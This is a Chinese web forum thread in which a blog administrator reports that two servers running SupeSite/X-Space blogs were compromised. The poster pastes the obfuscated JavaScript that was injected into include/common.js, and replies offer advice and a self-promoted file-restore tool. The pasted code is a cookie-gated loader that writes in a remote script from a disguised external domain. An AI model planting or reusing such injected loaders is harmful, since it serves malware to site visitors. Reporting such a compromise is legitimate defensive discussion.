今天发现我的两台服务器分别装的ss6.0-x-space4.X博客都被人蓦改了文件挂马

挂码的代码如下(include/common.js)：（在原文件的第139行下面开始添加）

1. ;var ss=document.cookie;
   
2. var aa=ss.indexOf("showtable");
   
3. var l="<";var r=">";var m="/";
   
4. if(aa!=-1){}else{var expires=new Date();
   
5. expires.setTime(expires.getTime()+24*60*60*1000);
   
6. document.cookie="showtable=true;expires="+expires.toGMTString();
   
7. document.write(l+"sc"+"ript src=ht"+"tp:"+m+m+"ww"+"w.n%36%388."+"cn"+m+"tf"+m+"ad1.j"+"s"+r+l+m+"sc"+"ript"+r);};

复制代码

是程序漏洞，还是我的问题呢

服务器杀毒软件截获以下信息

回复 1# wcl2222


    建议你使用uchome，而不是使用xspace,修复的可能性很小了。

我自己做过一个软件，专门针对服务器文件安全的，1秒内还原被修改的文件，可以记录指定目录所有文件的操作事件.....需要的话联系我qq:407292999